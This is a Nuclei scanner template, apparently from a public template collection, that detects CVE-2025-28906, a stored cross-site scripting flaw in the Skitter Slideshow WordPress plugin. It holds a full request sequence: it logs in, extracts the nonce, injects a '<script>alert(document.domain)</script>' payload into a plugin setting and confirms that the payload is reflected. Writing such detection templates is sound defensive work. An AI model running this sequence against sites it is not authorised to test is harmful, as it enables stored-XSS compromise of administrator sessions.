Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting

id: CVE-2025-28906

info:
  name: Skitter Slideshow <= 2.5.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
  author: nblirwn
  severity: medium
  description: |
    The Skitter Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping.
  impact: |
    Authenticated administrators can inject stored XSS through improperly sanitized configuration parameters, potentially compromising other administrator sessions and gaining persistent control.
  remediation: |
    Upgrade to Skitter Slideshow version 2.5.3 or later that properly sanitizes and escapes configuration inputs.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-skitter-slideshow/skitter-slideshow-252-authenticated-administrator-stored-cross-site-scripting
    - https://wordpress.org/plugins/wp-skitter-slideshow/
    - https://patchstack.com/database/wordpress/plugin/wp-skitter-slideshow/vulnerability/wordpress-skitter-slideshow-plugin-2-5-2-cross-site-scripting-xss-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-28906
    cwe-id: CWE-79
    epss-score: 0.00496
    epss-percentile: 0.38559
  metadata:
    verified: true
    max-request: 5
    publicwww-query: "/wp-content/plugins/wp-skitter-slideshow/"
  tags: cve,cve2025,wp-plugin,wp-skitter-slideshow,wordpress,wp,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "contains(body_1, 'wp-content/plugins/wp-skitter-slideshow/')"

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=wp_skitter_settings&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_skitter_menu&wp_skitter_type=posts&wp_skitter_category=1&wp_skitter_slides="><script>alert(document.domain)</script>&wp_skitter_xml=&wp_skitter_theme=square&wp_skitter_animation=random&wp_skitter_type_navigation=numbers&wp_skitter_width=&wp_skitter_height=&wp_skitter_background=%23000&wp_skitter_crop=true&wp_skitter_velocity=&wp_skitter_interval=&wp_skitter_navigation=true&wp_skitter_numbers_align=left&wp_skitter_label=true&wp_skitter_label_animation=&wp_skitter_width_label=&wp_skitter_easing_default=&wp_skitter_controls_position=&wp_skitter_focus_position=&wp_skitter_with_animations=&wp_skitter_auto_play=true

      - |
        GET /wp-admin/options-general.php?page=wp_skitter_menu HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_4 == 200"
          - "contains(body_4, '<script>alert(document.domain)</script>')"
        condition: and

    extractors:
      - type: regex
        name: nonce
        part: body_2
        group: 1
        internal: true
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
# digest: 490a0046304402203f8a086ec459f9f9f34827d042b0500f88b8f9b6a7be00b23f9e5ef66ed3a7890220142346058a5558849e5758a1a51083a503c87f621890d294f9468602f3c590e5:922c64590222798bb761d5b6d8e72950